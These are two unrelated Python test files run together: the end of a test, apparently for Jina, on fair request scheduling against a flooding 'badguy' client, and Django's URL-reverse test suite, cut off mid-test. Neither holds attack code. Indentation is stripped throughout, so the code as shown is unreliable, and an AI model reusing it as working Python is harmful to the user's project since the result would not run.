f = Flow(protocol=protocol, prefetch=prefetch).add(uses=Indexer)
with f:
# We have 5 good clients connecting to the same gateway. They have controlled requests.
# Each client sends `GOOD_CLIENT_NUM_DOCS` (20) requests and sleeps after each request.
for i in range(GOOD_CLIENTS):
p = Process(
target=partial(client, good_client_gen, f.port),
name=f'goodguy_{i}',
)
p.start()
pool.append(p)
# and 1 malicious client, sending lot of requests (trying to block others)
p = Process(
target=partial(client, malicious_client_gen, f.port),
name='badguy',
)
p.start()
pool.append(p)
for p in pool:
p.join()
order_of_ids = list(
Client(protocol=protocol, port=f.port)
.post(on='/status', inputs=[Document()], return_responses=True)[0]
.docs[0]
.tags['ids']
)
# There must be total 150 docs indexed.
assert (
len(order_of_ids)
== GOOD_CLIENTS * GOOD_CLIENT_NUM_DOCS + MALICIOUS_CLIENT_NUM_DOCS
)
"""
If prefetch is set, each Client is allowed (max) 5 requests at a time.
Since requests are controlled, `badguy` has to do the last 20 requests.
If prefetch is disabled, clients can freeflow requests. No client is blocked.
Hence last 20 requests go from `goodguy`.
(Ideally last 30 requests should be validated, to avoid flaky CI, we test last 20)
When there are no rules, badguy wins! With rule, you find balance in the world.
"""
if protocol == 'http':
# There's no prefetch for http.
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'goodguy'}
elif prefetch == 5:
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'badguy'}
elif prefetch == 0:
assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'goodguy'}
|
tests.py | """
Unit tests for reverse URL lookups.
"""
import sys
import threading
from admin_scripts.tests import AdminScriptTestCase
from django.conf import settings
from django.conf.urls import include, url
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import (
HttpRequest, HttpResponsePermanentRedirect, HttpResponseRedirect,
)
from django.shortcuts import redirect
from django.test import SimpleTestCase, TestCase, override_settings
from django.test.utils import override_script_prefix
from django.urls import (
NoReverseMatch, Resolver404, ResolverMatch, URLPattern, URLResolver,
get_callable, get_resolver, get_urlconf, resolve, reverse, reverse_lazy,
)
from django.urls.resolvers import RegexPattern
from . import middleware, urlconf_outer, views
from .utils import URLObject
from .views import empty_view
resolve_test_data = (
# These entries are in the format: (path, url_name, app_name, namespace, view_name, func, args, kwargs)
# Simple case
('/normal/42/37/', 'normal-view', '', '', 'normal-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}),
(
'/view_class/42/37/', 'view-class', '', '', 'view-class', views.view_class_instance, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/included/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/view_class/42/37/', 'inc-view-class', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-view-class',
views.view_class_instance, (), {'arg1': '42', 'arg2': '37'}
),
# Unnamed args are dropped if you have *any* kwargs in a pattern
('/mixed_args/42/37/', 'mixed-args', '', '', 'mixed-args', views.empty_view, (), {'arg2': '37'}),
(
'/included/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
(
'/included/12/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
# Unnamed views should have None as the url_name. Regression data for #21157.
(
'/unnamed/normal/42/37/', None, '', '', 'urlpatterns_reverse.views.empty_view', views.empty_view, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/unnamed/view_class/42/37/', None, '', '', 'urlpatterns_reverse.views.ViewClass', views.view_class_instance,
(), {'arg1': '42', 'arg2': '37'}
),
# If you have no kwargs, you get an args list.
('/no_kwargs/42/37/', 'no-kwargs', '', '', 'no-kwargs', views.empty_view, ('42', '37'), {}),
(
'/included/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('42', '37'), {}
),
(
'/included/12/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('12', '42', '37'), {}
),
# Namespaces
(
'/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'test-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'inc-ns1', 'inc-ns1:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'testapp:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'other-ns2:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'other-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Nested namespaces
(
'/ns-included1/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'inc-ns1:test-ns3', 'inc-ns1:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-ns1:inc-ns4:inc-ns2:test-ns3',
'inc-ns1:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp', 'inc-app:test-ns3',
'inc-app:test-ns3:urlobject-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-app:inc-ns4:inc-ns2:test-ns3',
'inc-app:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Namespaces capturing variables
(
'/inc70/', 'inner-nothing', 'included_urls', 'inc-ns5', 'inc-ns5:inner-nothing',
views.empty_view, (), {'outer': '70'}
),
(
'/inc78/extra/foobar/', 'inner-extra', 'included_urls', 'inc-ns5', 'inc-ns5:inner-extra',
views.empty_view, (), {'outer': '78', 'extra': 'foobar'}
),
)
test_data = (
('places', '/places/3/', [3], {}),
('places', '/places/3/', ['3'], {}),
('places', NoReverseMatch, ['a'], {}),
('places', NoReverseMatch, [], {}),
('places?', '/place/', [], {}),
('places+', '/places/', [], {}),
('places*', '/place/', [], {}),
('places2?', '/', [], {}),
('places2+', '/places/', [], {}),
('places2*', '/', [], {}),
('places3', '/places/4/', [4], {}),
('places3', '/places/harlem/', ['harlem'], {}),
('places3', NoReverseMatch, ['harlem64'], {}),
('places4', '/places/3/', [], {'id': 3}),
('people', NoReverseMatch, [], {}),
('people', '/people/adrian/', ['adrian'], {}),
('people', '/people/adrian/', [], {'name': 'adrian'}),
('people', NoReverseMatch, ['name with spaces'], {}),
('people', NoReverseMatch, [], {'name': 'name with spaces'}),
('people2', '/people/name/', [], {}),
('people2a', '/people/name/fred/', ['fred'], {}),
('people_backref', '/people/nate-nate/', ['nate'], {}),
('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
('optional', '/optional/fred/', [], {'name': 'fred'}),
('optional', '/optional/fred/', ['fred'], {}),
('named_optional', '/optional/1/', [1], {}),
('named_optional', '/optional/1/', [], {'arg1': 1}),
('named_optional', '/optional/1/2/', [1, 2], {}),
('named_optional', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('named_optional_terminated', '/optional/1/2/', [1, 2], {}),
('named_optional_terminated', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('hardcoded', '/hardcoded/', [], {}),
('hardcoded2', '/hardcoded/doc.pdf', [], {}),
('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('people3', NoReverseMatch, [], {'state': 'il'}),
('people3', NoReverseMatch, [], {'name': 'adrian'}),
('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
('people6', '/people//adrian/', ['adrian'], {}),
('range', '/character_set/a/', [], {}),
('range2', '/character_set/x/', [], {}),
('price', '/price/$10/', ['10'], {}),
('price2', '/price/$10/', ['10'], {}),
('price3', '/price/$10/', ['10'], {}),
('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
('headlines', '/headlines/2007.5.21/', [], {'year': 2007, 'month': 5, 'day': 21}),
(
'windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [],
{'drive_name': 'C', 'path': r'Documents and Settings\spam'}
),
('special', r'/special_chars/~@+%5C$*%7C/', [r'~@+\$*|'], {}),
('special', r'/special_chars/some%20resource/', [r'some resource'], {}),
('special', r'/special_chars/10%25%20complete/', [r'10% complete'], {}),
('special', r'/special_chars/some%20resource/', [], {'chars': r'some resource'}),
('special', r'/special_chars/10%25%20complete/', [], {'chars': r'10% complete'}),
('special', NoReverseMatch, [''], {}),
('mixed', '/john/0/', [], {'name': 'john'}),
('repeats', '/repeats/a/', [], {}),
('repeats2', '/repeats/aa/', [], {}),
('repeats3', '/repeats/aa/', [], {}),
('test', '/test/1', [], {}),
('inner-nothing', '/outer/42/', [], {'outer': '42'}),
('inner-nothing', '/outer/42/', ['42'], {}),
('inner-nothing', NoReverseMatch, ['foo'], {}),
('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
('inner-no-kwargs', '/outer-no-kwargs/42/inner-no-kwargs/1/', ['42', '1'], {}),
('disjunction', NoReverseMatch, ['foo'], {}),
('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
('extra-places', '/e-places/10/', ['10'], {}),
('extra-people', '/e-people/fred/', ['fred'], {}),
('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
('part', '/part/one/', [], {'value': 'one'}),
('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/part2/one/', [], {'value': 'one'}),
('part2', '/part2/', [], {}),
('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
# Tests for nested groups. Nested capturing groups will only work if you
# *only* supply the correct outer group.
('nested-noncapture', '/nested/noncapture/opt', [], {'p': 'opt'}),
('nested-capture', '/nested/capture/opt/', ['opt/'], {}),
('nested-capture', NoReverseMatch, [], {'p': 'opt'}),
('nested-mixedcapture', '/nested/capture/mixed/opt', ['opt'], {}),
('nested-mixedcapture', NoReverseMatch, [], {'p': 'opt'}),
('nested-namedcapture', '/nested/capture/named/opt/', [], {'outer': 'opt/'}),
('nested-namedcapture', NoReverseMatch, [], {'outer': 'opt/', 'inner': 'opt'}),
('nested-namedcapture', NoReverseMatch, [], {'inner': 'opt'}),
('non_path_include', '/includes/non_path_include/', [], {}),
# Tests for #13154
('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
('defaults', NoReverseMatch, [], {'arg2': 1}),
# Security tests
('security', '/%2Fexample.com/security/', ['/example.com'], {}),
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.no_urls')
class NoURLPatternsTests(SimpleTestCase):
def test_no_urls_exception(self):
"""
URLResolver should raise an exception when no urlpatterns exist.
"""
resolver = URLResolver(RegexPattern(r'^$'), settings.ROOT_URLCONF)
with self.assertRaisesMessage(
ImproperlyConfigured,
"The included URLconf 'urlpatterns_reverse.no_urls' does not "
"appear to have any patterns in it. If you see valid patterns in "
"the file then the issue is probably caused by a circular import."
):
getattr(resolver, 'url_patterns')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class URLPatternReverse(SimpleTestCase):
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
with self.subTest(name=name, args=args, kwargs=kwargs):
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(NoReverseMatch, expected)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
with self.assertRaises(NoReverseMatch):
reverse(None)
def test_mixing_args_and_kwargs(self):
msg = "Don't mix *args and **kwargs in call to reverse()!"
with self.assertRaisesMessage(ValueError, msg):
reverse('name', args=['a'], kwargs={'b': 'c'})
@override_script_prefix('/{{invalid}}/')
def test_prefix_braces(self):
self.assertEqual(
'/%7B%7Binvalid%7D%7D/includes/non_path_include/',
reverse('non_path_include')
)
def test_prefix_parenthesis(self):
# Parentheses are allowed and should not cause errors or be escaped
with override_script_prefix('/bogus)/'):
self.assertEqual(
'/bogus)/includes/non_path_include/',
reverse('non_path_include')
)
with override_script_prefix('/(bogus)/'):
self.assertEqual(
'/(bogus)/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/bump%20map/')
def test_prefix_format_char(self):
self.assertEqual(
'/bump%2520map/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/%7Eme/')
def test_non_urlsafe_prefix_with_args(self):
# Regression for #20022, adjusted for #24013 because ~ is an unreserved
# character. Tests whether % is escaped.
self.assertEqual('/%257Eme/places/1/', reverse('places', args=[1]))
def test_patterns_reported(self):
# Regression for #17076
with self.assertRaisesMessage(NoReverseMatch, r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"):
# this url exists, but requires an argument
reverse("people", args=[])
@override_script_prefix('/script:name/')
def test_script_name_escaping(self):
self.assertEqual(
reverse('optional', args=['foo:bar']),
'/script:name/optional/foo:bar/'
)
def test_view_not_found_message(self):
msg = (
"Reverse for 'nonexistent-view' not found. 'nonexistent-view' "
"is not a valid view function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('nonexistent-view')
def test_no_args_message(self):
msg = "Reverse for 'places' with no arguments not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places')
def test_illegal_args_message(self):
msg = "Reverse for 'places' with arguments '(1, 2)' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', args=(1, 2))
def test_illegal_kwargs_message(self):
msg = "Reverse for 'places' with keyword arguments '{'arg1': 2}' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', kwargs={'arg1': 2})
class ResolverTests(SimpleTestCase):
def test_resolver_repr(self):
"""
Test repr of URLResolver, especially when urlconf_name is a list
(#17892).
"""
# Pick a resolver from a namespaced URLconf
resolver = get_resolver('urlpatterns_reverse.namespace_urls')
sub_resolver = resolver.namespace_dict['test-ns1'][1]
self.assertIn('<URLPattern list>', repr(sub_resolver))
def test_reverse_lazy_object_coercion_by_resolve(self):
"""
Verifies lazy object returned by reverse_lazy is coerced to
text by resolve(). Previous to #21043, this would raise a TypeError.
"""
urls = 'urlpatterns_reverse.named_urls'
proxy_url = reverse_lazy('named-url1', urlconf=urls)
resolver = get_resolver(urls)
resolver.resolve(proxy_url)
def test_resolver_reverse(self):
resolver = get_resolver('urlpatterns_reverse.named_urls')
test_urls = [
# (name, args, kwargs, expected)
('named-url1', (), {}, ''),
('named-url2', ('arg',), {}, 'extra/arg/'),
('named-url2', (), {'extra': 'arg'}, 'extra/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_resolver_reverse_conflict(self):
"""
url() name arguments don't need to be unique. The last registered
pattern takes precedence for conflicting names.
"""
resolver = get_resolver('urlpatterns_reverse.named_urls_conflict')
test_urls = [
# (name, args, kwargs, expected)
# Without arguments, the last URL in urlpatterns has precedence.
('name-conflict', (), {}, 'conflict/'),
# With an arg, the last URL in urlpatterns has precedence.
('name-conflict', ('arg',), {}, 'conflict-last/arg/'),
# With a kwarg, other url()s can be reversed.
('name-conflict', (), {'first': 'arg'}, 'conflict-first/arg/'),
('name-conflict', (), {'middle': 'arg'}, 'conflict-middle/arg/'),
('name-conflict', (), {'last': 'arg'}, 'conflict-last/arg/'),
# The number and order of the arguments don't interfere with reversing.
('name-conflict', ('arg', 'arg'), {}, 'conflict/arg/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_non_regex(self):
"""
A Resolver404 is raised if resolving doesn't meet the basic
requirements of a path to match - i.e., at the very least, it matches
the root pattern '^/'. Never return None from resolve() to prevent a
TypeError from occurring later (#10834).
"""
test_urls = ['', 'a', '\\', '.']
for path in test_urls:
with self.subTest(path=path):
with self.assertRaises(Resolver404):
resolve(path)
def test_404_tried_urls_have_names(self):
"""
The list of URLs that come back from a Resolver404 exception contains
a list in the right format for printing out in the DEBUG 404 page with
both the patterns and URL names, if available.
"""
urls = 'urlpatterns_reverse.named_urls'
# this list matches the expected URL types and names returned when
# you try to resolve a nonexistent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/nonexistent-url')
url_types_names = [
[{'type': URLPattern, 'name': 'named-url1'}],
[{'type': URLPattern, 'name': 'named-url2'}],
[{'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url3'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url4'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLResolver}],
]
with self.assertRaisesMessage(Resolver404, 'tried') as cm:
resolve('/included/nonexistent-url', urlconf=urls)
e = cm.exception
# make sure we at least matched the root ('/') url resolver:
self.assertIn('tried', e.args[0])
self.assertEqual(
len(e.args[0]['tried']),
len(url_types_names),
'Wrong number of tried URLs returned. Expected %s, got %s.' % (
len(url_types_names), len(e.args[0]['tried'])
)
)
for tried, expected in zip(e.args[0]['tried'], url_types_names):
for t, e in zip(tried, expected):
with self.subTest(t):
self.assertIsInstance(t, e['type']), '%s is not an instance of %s' % (t, e['type'])
if 'name' in e:
if not e['name']:
self.assertIsNone(t.name, 'Expected no URL name but found %s.' % t.name)
else:
self.assertEqual(
t.name,
e['name'],
'Wrong URL name. Expected "%s", got "%s".' % (e['name'], t.name)
)
def test_namespaced_view_detail(self):
resolver = get_resolver('urlpatterns_reverse.nested_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view1'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view2'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.View3'))
self.assertFalse(resolver._is_callback('urlpatterns_reverse.nested_urls.blub'))
def test_view_detail_as_method(self):
# Views which have a class name as part of their path.
resolver = get_resolver('urlpatterns_reverse.method_view_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.method_view'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.classmethod_view'))
def test_populate_concurrency(self):
"""
URLResolver._populate() can be called concurrently, but not more
than once per thread (#26888).
"""
resolver = URLResolver(RegexPattern(r'^/'), 'urlpatterns_reverse.urls')
resolver._local.populating = True
thread = threading.Thread(target=resolver._populate)
thread.start()
thread.join()
self.assertNotEqual(resolver._reverse_dict, {})
@override_settings(ROOT_URLCONF='urlpatterns_reverse.reverse_lazy_urls')
class ReverseLazyTest(TestCase):
def test_redirect_with_lazy_reverse(self):
response = self.client.get('/redirect/')
self.assertRedirects(response, "/redirected_to/", status_code=302)
def test_user_permission_with_lazy_reverse(self):
alfred = User.objects.create_user('alfred', 'alfred@example.com', password='testpw')
response = self.client.get('/login_required_view/')
self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
self.client.force_login(alfred)
response = self.client.get('/login_required_view/')
self.assertEqual(response.status_code, 200)
def test_inserting_reverse_lazy_into_string(self):
self.assertEqual(
'Some URL: %s' % reverse_lazy('some-login-page'),
'Some URL: /login/'
)
class ReverseLazySettingsTest(AdminScriptTestCase):
"""
reverse_lazy can be used in settings without causing a circular
import error.
"""
def setUp(self):
self.write_settings(
'settings.py',
extra="from django.urls import reverse_lazy\nLOGIN_URL = reverse_lazy('login')",
)
def tearDown(self):
self.remove_settings('settings.py')
def test_lazy_in_settings(self):
out, err = self.run_manage(['check'])
self.assertNoOutput(err)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class ReverseShortcutTests(SimpleTestCase):
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj:
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertIsInstance(res, HttpResponseRedirect)
self.assertEqual(res.url, '/hi-there/')
res = redirect(FakeObj(), permanent=True)
self.assertIsInstance(res, HttpResponsePermanentRedirect)
self.assertEqual(res.url, '/hi-there/')
def test_redirect_to_view_name(self):
res = redirect('hardcoded2')
self.assertEqual(res.url, '/hardcoded/doc.pdf')
res = redirect('places', 1)
self.assertEqual(res.url, '/places/1/')
res = redirect('headlines', year='2008', month='02', day='17')
self.assertEqual(res.url, '/headlines/2008.02.17/')
with self.assertRaises(NoReverseMatch):
redirect('not-a-view')
def test_redirect_to_url(self):
res = redirect('/foo/')
self.assertEqual(res.url, '/foo/')
res = redirect('http://example.com/')
self.assertEqual(res.url, 'http://example.com/')
# Assert that we can redirect using UTF-8 strings
res = redirect('/æøå/abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5/abc/')
# Assert that no imports are attempted when dealing with a relative path
# (previously, the below would resolve in a UnicodeEncodeError from __import__ )
res = redirect('/æøå.abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5.abc/')
res = redirect('os.path')
self.assertEqual(res.url, 'os.path')
def test_no_illegal_imports(self):
# modules that are not listed in urlpatterns should not be importable
redirect("urlpatterns_reverse.nonimported_module.view")
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_reverse_by_path_nested(self):
# Views added to urlpatterns using include() should be reversible.
from .views import nested_view
self.assertEqual(reverse(nested_view), '/includes/nested_path/')
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res.url, '/absolute_arg_view/')
with self.assertRaises(NoReverseMatch):
redirect(absolute_kwargs_view, wrong_argument=None)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class NamespaceTests(SimpleTestCase):
def test_ambiguous_object(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('urlobject-view', [], {}),
('urlobject-view', [37, 42], {}),
('urlobject-view', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_ambiguous_urlpattern(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('inner-nothing', [], {}),
('inner-nothing', [37, 42], {}),
('inner-nothing', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_non_existent_namespace(self):
"""Nonexistent namespaces raise errors."""
test_urls = [
'blahblah:urlobject-view',
'test-ns1:blahblah:urlobject-view',
]
for name in test_urls:
with self.subTest(name=name):
with self.assertRaises(NoReverseMatch):
reverse(name)
def test_normal_name(self):
"""Normal lookups work as expected."""
test_urls = [
('normal-view', [], {}, '/normal/'),
('normal-view', [37, 42], {}, '/normal/37/42/'),
('normal-view', [], {'arg1': 42, 'arg2': 37}, '/normal/42/37/'),
('special-view', [], {}, '/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_simple_included_name(self):
"""Normal lookups work on names included from other patterns."""
test_urls = [
('included_namespace_urls:inc-normal-view', [], {}, '/included/normal/'),
('included_namespace_urls:inc-normal-view', [37, 42], {}, '/included/normal/37/42/'),
('included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/included/normal/42/37/'),
('included_namespace_urls:inc-special-view', [], {}, '/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_object(self):
"""Dynamic URL objects can be found using a namespace."""
test_urls = [
('test-ns1:urlobject-view', [], {}, '/test1/inner/'),
('test-ns1:urlobject-view', [37, 42], {}, '/test1/inner/37/42/'),
('test-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/test1/inner/42/37/'),
('test-ns1:urlobject-special-view', [], {}, '/test1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object(self):
"""
Dynamic URL objects can return a (pattern, app_name) 2-tuple, and
include() can set the namespace.
"""
test_urls = [
('new-ns1:urlobject-view', [], {}, '/newapp1/inner/'),
('new-ns1:urlobject-view', [37, 42], {}, '/newapp1/inner/37/42/'),
('new-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/newapp1/inner/42/37/'),
('new-ns1:urlobject-special-view', [], {}, '/newapp1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object_default_namespace(self):
"""
Namespace defaults to app_name when including a (pattern, app_name)
2-tuple.
"""
test_urls = [
('newapp:urlobject-view', [], {}, '/new-default/inner/'),
('newapp:urlobject-view', [37, 42], {}, '/new-default/inner/37/42/'),
('newapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/new-default/inner/42/37/'),
('newapp:urlobject-special-view', [], {}, '/new-default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_embedded_namespace_object(self):
"""Namespaces can be installed anywhere in the URL pattern tree."""
test_urls = [
('included_namespace_urls:test-ns3:urlobject-view', [], {}, '/included/test3/inner/'),
('included_namespace_urls:test-ns3:urlobject-view', [37, 42], {}, '/included/test3/inner/37/42/'),
(
'included_namespace_urls:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/included/test3/inner/42/37/',
),
('included_namespace_urls:test-ns3:urlobject-special-view', [], {}, '/included/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern(self):
"""Namespaces can be applied to include()'d urlpatterns."""
test_urls = [
('inc-ns1:inc-normal-view', [], {}, '/ns-included1/normal/'),
('inc-ns1:inc-normal-view', [37, 42], {}, '/ns-included1/normal/37/42/'),
('inc-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/ns-included1/normal/42/37/'),
('inc-ns1:inc-special-view', [], {}, '/ns-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_name_pattern(self):
"""
Namespaces can be applied to include()'d urlpatterns that set an
app_name attribute.
"""
test_urls = [
('app-ns1:inc-normal-view', [], {}, '/app-included1/normal/'),
('app-ns1:inc-normal-view', [37, 42], {}, '/app-included1/normal/37/42/'),
('app-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/app-included1/normal/42/37/'),
('app-ns1:inc-special-view', [], {}, '/app-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern_with_variable_prefix(self):
"""
Using include() with namespaces when there is a regex variable in front
of it.
"""
test_urls = [
('inc-outer:inc-normal-view', [], {'outer': 42}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [42], {}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [], {'arg1': 37, 'arg2': 4, 'outer': 42}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-normal-view', [42, 37, 4], {}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-special-view', [], {'outer': 42}, '/ns-outer/42/+%5C$*/'),
